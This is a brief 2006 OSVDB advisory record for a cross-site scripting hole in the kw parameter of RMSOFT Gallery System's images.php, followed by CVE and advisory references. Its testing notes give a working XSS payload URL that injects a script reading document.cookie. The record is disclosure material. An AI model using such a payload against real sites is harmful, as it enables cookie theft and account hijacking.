RMSOFT Gallery System images.php kw Variable XSS

2006-10-21T16:33:55
ID OSVDB:30005
Type osvdb
Reporter OSVDB
Modified 2006-10-21T16:33:55

Description

Manual Testing Notes

/modules/rmgs/images.php?kw=<script>alert(document.cookie)</script>&q=search

References:

Security Tracker: 1017112 Secunia Advisory ID:22426 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0364.html ISS X-Force ID: 29769 FrSIRT Advisory: ADV-2006-4161 CVE-2006-5532 Bugtraq ID: 20676